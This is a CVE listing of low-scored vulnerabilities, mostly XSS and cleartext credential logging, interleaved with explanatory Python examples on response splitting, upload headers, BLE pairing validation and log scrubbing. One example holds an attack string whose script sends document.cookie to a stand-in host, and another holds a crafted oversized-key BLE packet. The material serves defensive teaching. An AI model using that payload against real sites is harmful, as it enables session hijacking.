Security Vulnerabilities (CVSS score between 3 and 3.99)

Columns for each entry: CVEdetails row number, CVE ID, CWE ID, number of listed exploits, vulnerability type(s), publish date, update date; CVSS v2 score; Gained Access Level, Access Vector, Access Complexity, Authentication, and the Confidentiality, Integrity and Availability impacts; then the description. Note on the Authentication column: the CVEdetails listing prints "???" where the CVSS v2 vector is Au:S, i.e. one authenticated session is required ("Single system"). The scores bear this out: AV:N/AC:M/Au:S with a single Partial impact scores 3.5, whereas Au:N would score 4.3.
1951. CVE-2019-19756 | CWE-532 | Exploits: none listed | Type: (none listed) | Published: 2020-03-13 | Updated: 2020-03-18
CVSS v2 3.6 | Gained access: None | Access vector: Local | Complexity: Low | Authentication: Not required | Confidentiality: Partial | Integrity: Partial | Availability: None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered Windows OS credentials, used to perform driver updates of managed systems, being written to a log file in clear text. This only affects LXCA version 2.6.0 when performing a Windows driver update. Affected logs are only accessible to authorized users in the First Failure Data Capture (FFDC) service log and log files on LXCA.
1952. CVE-2019-19742 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-18 | Updated: 2021-04-23
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
On D-Link DIR-615 devices, the User Account Configuration page is vulnerable to blind XSS via the name field.
1953. CVE-2019-19693 | CWE-200 | Exploits: none listed | Type: Exec Code +Info | Published: 2019-12-20 | Updated: 2020-01-02
CVSS v2 3.6 | Gained access: None | Access vector: Local | Complexity: Low | Authentication: Not required | Confidentiality: Partial | Integrity: None | Availability: Partial
The Trend Micro Security 2020 consumer family of products contains a vulnerability that could allow a local attacker to disclose sensitive information or to create a denial-of-service condition on affected installations. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
1954. CVE-2019-19687 | CWE-522 | Exploits: none listed | Type: +Info | Published: 2019-12-09 | Updated: 2019-12-20
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: Partial | Integrity: None | Availability: None
OpenStack Keystone 15.0.0 and 16.0.0 is affected by Data Leakage in the list credentials API. Any user with a role on a project is able to list any credentials with the /v3/credentials API when enforce_scope is false. Users with a role on a project are able to view any other users' credentials, which could (for example) leak sign-on information for Time-based One Time Passwords (TOTP). Deployments with enforce_scope set to false are affected. (There will be a slight performance impact for the list credentials API once this issue is fixed.)
1955. CVE-2019-19682 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-09 | Updated: 2019-12-10
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
nopCommerce through 4.20 allows XSS in the SaveStoreMappings of the components \Presentation\Nop.Web\Areas\Admin\Controllers\NewsController.cs and \Presentation\Nop.Web\Areas\Admin\Controllers\BlogController.cs via Body or Full to Admin/News/NewsItemEdit/[id] or Admin/Blog/BlogPostEdit/[id]. NOTE: the vendor reportedly considers this a "feature" because the affected components are an HTML content editor.
1956. CVE-2019-19679 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-09 | Updated: 2019-12-11
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
In "Xray Test Management for Jira" prior to version 3.5.5, remote authenticated attackers can cause XSS in the Pre-Condition Summary entry point via the summary field of a Create Pre-Condition action for a new Test Issue.
1957. CVE-2019-19678 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-09 | Updated: 2019-12-11
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
In "Xray Test Management for Jira" prior to version 3.5.5, remote authenticated attackers can cause XSS in the generic field entry point via the Generic Test Definition field of a new Generic Test issue.
1958. CVE-2019-19615 | CWE-79 | Exploits: none listed | Type: Exec Code XSS | Published: 2020-03-16 | Updated: 2020-03-19
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Multiple XSS vulnerabilities exist in the Backup & Restore module v14.0.10.2 through v14.0.10.7 for FreePBX, as shown at /admin/config.php?display=backup on the FreePBX Administrator web site. An attacker can modify the id parameter of the backup configuration screen and embed malicious XSS code via a link. When another user (such as an admin) clicks the link, the XSS payload will render and execute in the context of the victim user's account.
1959. CVE-2019-19612 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-03-16 | Updated: 2020-06-25
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
An issue was discovered in Halvotec RaQuest 10.23.10801.0. Several features of the application allow stored Cross-site Scripting (XSS). Fixed in Release 24.2020.20608.0.
1960. CVE-2019-19596 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-05 | Updated: 2019-12-06
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
GitBook through 2.6.9 allows XSS via a local .md file.
1961. CVE-2019-19552 | CWE-79 | Exploits: none listed | Type: Exec Code XSS | Published: 2019-12-06 | Updated: 2019-12-10
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
In userman 13.0.76.43 through 15.0.20 in Sangoma FreePBX, XSS exists in the user management screen of the Administrator web site, i.e., the /admin/config.php?display=userman URI. An attacker with sufficient privileges can edit the Display Name of a user and embed malicious XSS code. When another user (such as an admin) visits the main User Management screen, the XSS payload will render and execute in the context of the victim user's account.
1962. CVE-2019-19551 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-06 | Updated: 2019-12-11
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
In userman 13.0.76.43 through 15.0.20 in Sangoma FreePBX, XSS exists in the User Management screen of the Administrator web site. An attacker with access to the User Control Panel application can submit malicious values in some of the time/date formatting and time-zone fields. These fields are not being properly sanitized. If this is done and a user (such as an admin) visits the User Management screen and views that user's profile, the XSS payload will render and execute in the context of the victim user's account.
1963. CVE-2019-19542 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-26 | Updated: 2019-12-30
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
The ListingPro theme before v2.0.14.2 for WordPress has Persistent XSS via the Good For field on the new listing submit page.
1964. CVE-2019-19541 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-26 | Updated: 2020-01-02
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
The ListingPro theme before v2.0.14.2 for WordPress has Persistent XSS via the Best Day/Night field on the new listing submit page.
1965. CVE-2019-19514 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-05-05 | Updated: 2020-05-07
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Ayision Ays-WR01 v28K.RPT.20161224 devices allow stored XSS in basic repeater settings via an SSID.
1966. CVE-2019-19500 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-04-15 | Updated: 2020-04-17
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Matrix42 Workspace Management 9.1.2.2765 and below allows stored XSS via unfiltered description parameters, as demonstrated by the comment field of a special order for individual software.
1967. CVE-2019-19497 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-17 | Updated: 2019-12-20
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
MDaemon Email Server 17.5.1 allows XSS via the filename of an attachment to an email message.
1968. CVE-2019-19496 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-02 | Updated: 2019-12-11
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Alfresco Enterprise before 5.2.5 allows stored XSS via an uploaded HTML document.
1969. CVE-2019-19461 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-03-16 | Updated: 2020-03-19
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Post-authentication Stored XSS in Team Password Manager through 7.93.204 allows attackers to steal other users' credentials by creating a shared password with HTML code as the title.
1970. CVE-2019-19457 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-03 | Updated: 2019-12-11
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
SALTO ProAccess SPACE 5.4.3.0 allows XSS.
1971. CVE-2019-19441 | CWE-200 | Exploits: none listed | Type: +Info | Published: 2020-01-03 | Updated: 2020-01-07
CVSS v2 3.3 | Gained access: None | Access vector: Local Network | Complexity: Low | Authentication: Not required | Confidentiality: Partial | Integrity: None | Availability: None
HUAWEI P30 smartphones with versions earlier than 10.0.0.166(C00E66R1P11) have an information leak vulnerability. An attacker could send a specific command on the local area network (LAN) to exploit this vulnerability. Successful exploitation may cause an information leak.
1972. CVE-2019-19390 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-04-15 | Updated: 2020-04-22
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
The Search parameter of the Software Catalogue section of Matrix42 Workspace Management 9.1.2.2765 and below accepts unfiltered parameters that lead to multiple reflected XSS issues.
1973. CVE-2019-19389 | CWE-74 | Exploits: none listed | Type: Http R.Spl. | Published: 2019-12-26 | Updated: 2020-08-24
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
JetBrains Ktor framework before version 1.2.6 was vulnerable to HTTP Response Splitting.
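What "HTTP Response Splitting" in the Ktor row above means in practice, as an added example that is not Ktor's code nor part of the original listing: a redirect handler that copies a user-supplied URL into the Location header by string concatenation, beside the same builder with the check that closes the hole. The handler, the header builder and the attacker's `next` value are all constructed for this illustration.

```python
# Added example for the HTTP response splitting row above (CVE-2019-19389).
# Illustrative Python, not Ktor's code: the redirect handler, header builder
# and attacker input are constructed.
from typing import List, Tuple

Headers = List[Tuple[str, str]]


class HeaderInjection(ValueError):
    """Raised when a header name or value would break the header block."""


def build_response_vulnerable(status: str, headers: Headers, body: bytes) -> bytes:
    """Serialises headers by concatenation; a CR/LF inside a value ends the
    header early and lets the value write its own headers and body."""
    head = f"HTTP/1.1 {status}\r\n"
    head += "".join(f"{name}: {value}\r\n" for name, value in headers)
    return (head + "\r\n").encode("latin-1") + body


def build_response_hardened(status: str, headers: Headers, body: bytes) -> bytes:
    """Same serialisation, but refuses any name or value that could split
    the header block (CR, LF, NUL in values; additionally ':' in names)."""
    for name, value in headers:
        if any(ch in name for ch in "\r\n\0:") or any(ch in value for ch in "\r\n\0"):
            raise HeaderInjection(f"illegal control character in header {name!r}")
    return build_response_vulnerable(status, headers, body)


def redirect_vulnerable(next_url: str) -> bytes:
    """A 'return to' redirect that trusts a user-supplied URL as-is."""
    return build_response_vulnerable("302 Found", [("Location", next_url)], b"")


def redirect_hardened(next_url: str) -> bytes:
    return build_response_hardened("302 Found", [("Location", next_url)], b"")


def parse_response(raw: bytes) -> Tuple[str, Headers, bytes]:
    """Parses the bytes the way a client or an intermediate cache would."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(": ")
        headers.append((name, value))
    return status_line, headers, body


# Constructed attacker value for the "next" parameter: the first CRLF ends
# the Location header, the empty line ends the header block, and the rest
# becomes a body that the browser renders on the redirect response.
ATTACK = ("/home\r\n"
          "Set-Cookie: session=attacker-chosen\r\n"
          "\r\n"
          "<script>document.location='https://evil.example/?c='+document.cookie</script>")


def demo() -> bool:
    """True when the vulnerable builder lets the injected header and body
    through and the hardened builder rejects the same input."""
    _, injected_headers, injected_body = parse_response(redirect_vulnerable(ATTACK))
    split_happened = (("Set-Cookie", "session=attacker-chosen") in injected_headers
                      and injected_body.startswith(b"<script>"))
    try:
        redirect_hardened(ATTACK)
        rejected = False
    except HeaderInjection:
        rejected = True
    return split_happened and rejected


if __name__ == "__main__":
    print("response splitting demonstrated and blocked:", demo())
```

The injected Set-Cookie fixes the victim's session and the injected body runs in the application's origin, which is why a "low" integrity-only score understates what a splitting bug chains into. A redirect handler should also restrict `next` to same-origin relative paths, but it is the CR/LF rejection in the header API itself that closes splitting for every header, not just Location.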
1974. CVE-2019-19311 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-01-03 | Updated: 2020-01-09
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
GitLab EE 8.14 through 12.5, 12.4.3, and 12.3.6 allows XSS in group and profile fields.
1975. CVE-2019-19306 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-11-26 | Updated: 2020-10-29
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
The Zoho CRM Lead Magnet plugin 1.6.9.1 for WordPress allows XSS via module, EditShortcode, or LayoutName.
1976. CVE-2019-19294 | CWE-79 | Exploits: none listed | Type: Exec Code XSS | Published: 2020-03-10 | Updated: 2021-04-22
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
A vulnerability has been identified in Control Center Server (CCS) (All versions < V1.5.0). The web interface of the Control Center Server (CCS) contains multiple stored Cross-site Scripting (XSS) vulnerabilities in several input fields. This could allow an authenticated remote attacker to inject malicious JavaScript code into the CCS web application that is later executed in the browser context of any other user who views the relevant CCS web content.
1977. CVE-2019-19291 | CWE-313 | Exploits: none listed | Type: (none listed) | Published: 2020-03-10 | Updated: 2021-04-22
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: Partial | Integrity: None | Availability: None
A vulnerability has been identified in Control Center Server (CCS) (All versions < V1.5.0), SiNVR/SiVMS Video Server (All versions < V5.0.0). The FTP services of the SiVMS/SiNVR Video Server and the Control Center Server (CCS) maintain log files that store login credentials in cleartext. In configurations where the FTP service is enabled, authenticated remote attackers could extract login credentials of other users of the service.
1978. CVE-2019-19285 | CWE-80 | Exploits: none listed | Type: XSS | Published: 2020-12-14 | Updated: 2020-12-15
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
A vulnerability has been identified in XHQ (All Versions < 6.1). The web interface could allow injections that could lead to XSS attacks if unsuspecting users are tricked into accessing a malicious link.
1979. CVE-2019-19284 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-12-14 | Updated: 2020-12-15
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
A vulnerability has been identified in XHQ (All Versions < 6.1). The web interface could allow Cross-Site Scripting (XSS) attacks if an attacker is able to modify content of particular web pages, causing the application to behave in unexpected ways for legitimate users.
1980. CVE-2019-19266 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-01-06 | Updated: 2020-01-08
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
IceWarp WebMail Server 12.2.0 and 12.1.x before 12.2.1.1 (and probably earlier versions) allows XSS (issue 2 of 2) in notes for objects.
1981. CVE-2019-19222 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-03-04 | Updated: 2020-03-05
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
A Stored XSS issue in the D-Link DSL-2680 web administration interface (Firmware EU_1.03) allows an authenticated attacker to inject arbitrary JavaScript code into the info.html administration page by sending a crafted Forms/wireless_autonetwork_1 POST request.
1982. CVE-2019-19210 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-03-16 | Updated: 2020-03-18
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Dolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.
1983. CVE-2019-19206 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-11-26 | Updated: 2019-12-10
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
Dolibarr CRM/ERP 10.0.3 allows viewimage.php?file= Stored XSS due to JavaScript execution in an SVG image for a profile picture.
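The Alfresco and the two Dolibarr rows above are one bug in three forms: a file the user uploaded (HTML, or an SVG carrying script) is later served from the application's own origin with a type the browser will render as a document. Renaming the file on disk, as the ".noexe" row shows, does nothing if the response's Content-Type still says text/html. The following is an added example, not code from Alfresco or Dolibarr, of deciding the response headers for a stored upload; the type lists, the header set and the sample file names are assumptions to tune per application.

```python
# Added example for the Alfresco, Dolibarr ".noexe" and Dolibarr SVG rows
# above: choosing response headers for user uploads so that HTML and SVG are
# never rendered as a document from the application's origin. Illustrative
# code, not any of those vendors'; type lists and headers are assumptions.
import mimetypes
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import quote

# Types a browser will parse as a document and run script from, or load as
# script/style. Any hint of these means: opaque bytes, forced download.
ACTIVE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "text/javascript", "application/javascript", "application/x-javascript",
    "text/xml", "application/xml", "text/css",
}

# Passive types that may be shown inline once content sniffing is disabled.
INLINE_OK = {"image/png", "image/jpeg", "image/gif", "image/webp",
             "application/pdf", "text/plain"}


@dataclass(frozen=True)
class DownloadHeaders:
    content_type: str
    content_disposition: str
    x_content_type_options: str = "nosniff"
    # Even for inline types: no script, no embedding, no same-origin access.
    content_security_policy: str = "default-src 'none'; sandbox"


def _ascii_name(name: str) -> str:
    """Conservative ASCII name for the plain filename= parameter; quotes,
    CR/LF and non-ASCII would otherwise corrupt the header."""
    return re.sub(r"[^A-Za-z0-9._-]", "_", name) or "download"


def _disposition(kind: str, original_name: str) -> str:
    # RFC 6266 / RFC 5987: ASCII fallback plus a percent-encoded UTF-8 form.
    return (f'{kind}; filename="{_ascii_name(original_name)}"; '
            f"filename*=UTF-8''{quote(original_name)}")


def headers_for_upload(original_name: str, declared_type: Optional[str]) -> DownloadHeaders:
    """Decide how to serve a stored upload.

    original_name: the name the uploader gave, before any server-side rename
                   (such as Dolibarr's ".noexe" suffix).
    declared_type: the Content-Type recorded at upload time, if any.
    """
    guessed, _ = mimetypes.guess_type(original_name)
    candidates = {t.split(";")[0].strip().lower() for t in (declared_type, guessed) if t}

    # Exactly one, agreed-upon, passive type: inline is acceptable.
    if len(candidates) == 1 and not candidates & ACTIVE_TYPES:
        (content_type,) = candidates
        if content_type in INLINE_OK:
            return DownloadHeaders(content_type, _disposition("inline", original_name))

    # Active, unknown or conflicting type: never let the browser interpret it.
    return DownloadHeaders("application/octet-stream",
                           _disposition("attachment", original_name))


if __name__ == "__main__":
    for name, declared in [("avatar.svg", "image/svg+xml"),
                           ("report.html", None),
                           ("photo.png", "image/png"),
                           ("photo.png", "text/html")]:
        print(name, declared, "->", headers_for_upload(name, declared))
```

The stronger fix, which this example does not show, is to serve uploads from a separate origin (a dedicated download host) so that even a rendered upload cannot reach the application's cookies or DOM; the headers above are what to do when that is not available. Note that an SVG referenced from an `<img>` tag does not run script, but the same file opened by URL does, which is exactly the `viewimage.php?file=` case in the Dolibarr row.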
1984. CVE-2019-19198 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-12 | Updated: 2020-03-19
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
The Scoutnet Kalender plugin 1.1.0 for WordPress allows XSS.
1985. CVE-2019-19196 | CWE-120 | Exploits: none listed | Type: DoS Overflow | Published: 2020-02-12 | Updated: 2020-02-25
CVSS v2 3.3 | Gained access: None | Access vector: Local Network | Complexity: Low | Authentication: Not required | Confidentiality: None | Integrity: None | Availability: Partial
The Bluetooth Low Energy Secure Manager Protocol (SMP) implementation on Telink Semiconductor BLE SDK versions before November 2019 for TLSR8x5x through 3.4.0, TLSR823x through 1.3.0, and TLSR826x through 3.3 devices accepts a pairing request with a key size greater than 16 bytes, allowing an attacker in radio range to cause a buffer overflow and denial of service (crash) via crafted packets.
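The Telink row above is a missing range check on one byte of a seven-byte PDU: the SMP Pairing Request carries a "Maximum Encryption Key Size" that the specification bounds to 7..16, and a stack that sizes a copy into its 16-byte key buffer from that field without checking it overflows on a crafted 0x40. The following added example, not the Telink SDK's code, parses the Pairing Request on the responder side, rejects an out-of-range key size with a Pairing Failed PDU before anything uses the value, and negotiates the key size downward as the protocol expects. The responder's own capabilities and the sample packets are constructed.

```python
# Added example for the Telink BLE SMP row above (CVE-2019-19196): parsing a
# Pairing Request and rejecting an out-of-range "Maximum Encryption Key Size"
# before anything sizes a buffer from it. Illustrative Python, not the Telink
# SDK's code; the responder capabilities below are constructed values.
import struct
from dataclasses import dataclass

# SMP command codes and the Pairing Failed reason codes used here.
SMP_PAIRING_REQUEST = 0x01
SMP_PAIRING_RESPONSE = 0x02
SMP_PAIRING_FAILED = 0x05
REASON_ENCRYPTION_KEY_SIZE = 0x06
REASON_INVALID_PARAMETERS = 0x0A

# The spec allows 7..16 octets; the overflow in the row above comes from
# trusting a larger value when copying into a 16-byte key buffer.
KEY_SIZE_MIN, KEY_SIZE_MAX = 7, 16

# Responder capabilities (constructed): NoInputNoOutput, no OOB, LTK only.
OUR_IO_CAPABILITY = 0x03
OUR_MAX_KEY_SIZE = 16
OUR_KEY_DIST = 0x01
AUTHREQ_BONDING_MASK = 0x01


class SmpError(Exception):
    def __init__(self, reason: int):
        super().__init__(f"SMP failure reason 0x{reason:02x}")
        self.reason = reason


@dataclass(frozen=True)
class PairingRequest:
    io_capability: int
    oob_data_flag: int
    auth_req: int
    max_key_size: int
    initiator_key_dist: int
    responder_key_dist: int


def parse_pairing_request(pdu: bytes) -> PairingRequest:
    """Pairing Request is exactly 7 octets: code plus six one-octet fields.
    Length and every range-limited field are checked before any use."""
    if len(pdu) != 7 or pdu[0] != SMP_PAIRING_REQUEST:
        raise SmpError(REASON_INVALID_PARAMETERS)
    req = PairingRequest(*struct.unpack("<6B", pdu[1:]))
    if not KEY_SIZE_MIN <= req.max_key_size <= KEY_SIZE_MAX:
        # This is the check the vulnerable stack lacked.
        raise SmpError(REASON_ENCRYPTION_KEY_SIZE)
    if req.io_capability > 0x04 or req.oob_data_flag > 0x01:
        raise SmpError(REASON_INVALID_PARAMETERS)
    return req


def handle_pairing_request(pdu: bytes) -> bytes:
    """Responder side: returns the Pairing Response PDU on success, or a
    Pairing Failed PDU carrying the reason code."""
    try:
        req = parse_pairing_request(pdu)
    except SmpError as err:
        return bytes([SMP_PAIRING_FAILED, err.reason])
    # The negotiated key size is the smaller of the two sides' maxima.
    negotiated = min(req.max_key_size, OUR_MAX_KEY_SIZE)
    return struct.pack("<7B", SMP_PAIRING_RESPONSE, OUR_IO_CAPABILITY, 0x00,
                       req.auth_req & AUTHREQ_BONDING_MASK, negotiated,
                       req.initiator_key_dist & OUR_KEY_DIST,
                       req.responder_key_dist & OUR_KEY_DIST)


def negotiated_key_size(response: bytes) -> int:
    """Reads the key size back out of a Pairing Response (raises on Failed)."""
    if response[0] != SMP_PAIRING_RESPONSE:
        raise SmpError(response[1])
    return response[4]


if __name__ == "__main__":
    # Constructed packets: a normal request (key size 16) and one claiming 0x40.
    ok = bytes([0x01, 0x04, 0x00, 0x01, 0x10, 0x01, 0x01])
    crafted = bytes([0x01, 0x04, 0x00, 0x01, 0x40, 0x01, 0x01])
    print(handle_pairing_request(ok).hex(), handle_pairing_request(crafted).hex())
```

In a C stack the same check belongs immediately before the `memcpy` that builds the key from the negotiated size; the STMicroelectronics row that follows is the other common failure of the same shape, state that is not validated across consecutive PDUs rather than a single out-of-range field.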
1986. CVE-2019-19192 | CWE-20 | Exploits: none listed | Type: (none listed) | Published: 2020-02-12 | Updated: 2020-02-26
CVSS v2 3.3 | Gained access: None | Access vector: Local Network | Complexity: Low | Authentication: Not required | Confidentiality: None | Integrity: None | Availability: Partial
The Bluetooth Low Energy implementation on STMicroelectronics BLE Stack through 1.3.1 for STM32WB5x devices does not properly handle consecutive Attribute Protocol (ATT) requests on reception, allowing attackers in radio range to cause an event deadlock or crash via crafted packets.
1987. CVE-2019-19150 | CWE-532 | Exploits: none listed | Type: (none listed) | Published: 2019-12-23 | Updated: 2019-12-30
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: Partial | Integrity: None | Availability: None
On versions 15.0.0-15.0.1.1, 14.1.0-14.1.2, 14.0.0-14.0.1, 13.1.0-13.1.3.1, 12.1.0-12.1.5, and 11.5.2-11.6.5.1, the BIG-IP APM system logs the client-session-id when a per-session policy is attached to the virtual server with debug logging enabled.
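Three rows above (Lenovo LXCA writing Windows OS credentials to its FFDC log, the Siemens SiVMS/SiNVR and CCS FTP services logging passwords, and BIG-IP APM logging the client-session-id under debug logging) are the same CWE-532 failure: a secret that was legitimately in memory reached a log line. The usual control is a scrubber in the logging path. The following added example, not any of those vendors' code, runs such a scrubber over constructed log lines shaped like the three cases; the field-name list and the regular expressions are assumptions to extend for a given product's formats.

```python
# Added example for the LXCA, SiNVR/CCS FTP and BIG-IP APM rows above, all of
# which come down to secrets (OS credentials, FTP passwords, session IDs)
# written to log files. Illustrative Python log scrubber, not any vendor's
# code; the log lines and the key-name list are constructed.
import re
from typing import Iterable, List

# Field names whose values must never reach a log (assumption: common
# spellings; extend for your own formats).
SECRET_KEYS = (r"(?:client-session-id|session[_-]?id|pass(?:word|wd)?|pwd|"
               r"secret|token|api[_-]?key)")

PATTERNS = [
    # key=value, key: value, "key": "value"  ->  keep the key, drop the value.
    (re.compile(rf"(?i)(\b{SECRET_KEYS}\b\s*[\"']?\s*[:=]\s*[\"']?)([^\s\"'&,;]+)"),
     r"\1[REDACTED]"),
    # HTTP Authorization credentials.
    (re.compile(r"(?i)(Authorization:\s*(?:Basic|Bearer)\s+)\S+"), r"\1[REDACTED]"),
    # FTP control channel: the PASS command carries the password in clear.
    (re.compile(r"(\bPASS\s+)\S+"), r"\1[REDACTED]"),
]


def scrub(line: str) -> str:
    """Returns the line with every recognised secret value replaced."""
    for pattern, replacement in PATTERNS:
        line = pattern.sub(replacement, line)
    return line


def leaks_secret(line: str) -> bool:
    return scrub(line) != line


def scrub_log(lines: Iterable[str]) -> List[str]:
    return [scrub(line) for line in lines]


def count_leaks(lines: Iterable[str]) -> int:
    return sum(1 for line in lines if leaks_secret(line))


# Constructed lines in the shape of the three rows above, plus benign ones.
SAMPLE_LOG = [
    "2020-03-12T10:41:07Z INFO driverupdate target=win-srv-07 user=Administrator password=Hunter2! status=started",
    "ftpd[2311]: 10.0.4.15 > USER operator",
    "ftpd[2311]: 10.0.4.15 > PASS s3cr3t-ftp",
    "apm: per-session policy attached; client-session-id=0a1b2c3d4e5f6a7b vs=/Common/portal_vs",
    "GET /api/v1/credentials HTTP/1.1 Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.signature",
    '{"db": {"host": "redis01", "password": "changeme"}}',
    "2020-03-12T10:41:09Z INFO driverupdate target=win-srv-07 user=Administrator status=ok",
]

if __name__ == "__main__":
    for original, cleaned in zip(SAMPLE_LOG, scrub_log(SAMPLE_LOG)):
        print(("LEAK  " if original != cleaned else "clean ") + cleaned)
```

A scrubber of this kind is a safety net, not the fix: the LXCA and Siemens rows were fixed by not passing the secret into the logging call at all, and the BIG-IP row shows why debug-level logging on production appliances needs the same review as the normal path. Run `count_leaks` over a sample of real log output as a regression check after upgrades, since vendors' log formats change and the patterns here only know the shapes they were written for.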
1988. CVE-2019-19110 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-06-15 | Updated: 2020-06-15
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
The wpForo plugin 1.6.5 for WordPress allows XSS via the wp-admin/admin.php?page=wpforo-phrases s parameter.
1989. CVE-2019-19100 | CWE-269 | Exploits: none listed | Type: (none listed) | Published: 2020-04-29 | Updated: 2020-05-13
CVSS v2 3.6 | Gained access: None | Access vector: Local | Complexity: Low | Authentication: Not required | Confidentiality: None | Integrity: Partial | Availability: Partial
A privilege escalation vulnerability in the upgrade service in B&R Automation Studio versions 4.0.x, 4.1.x, 4.2.x, < 4.3.11SP, < 4.4.9SP, < 4.5.4SP, < 4.6.3SP, < 4.7.2 and < 4.8.1 allows authenticated users to delete arbitrary files via an exposed interface.
1990. CVE-2019-19096 | CWE-522 | Exploits: none listed | Type: (none listed) | Published: 2020-04-02 | Updated: 2020-04-03
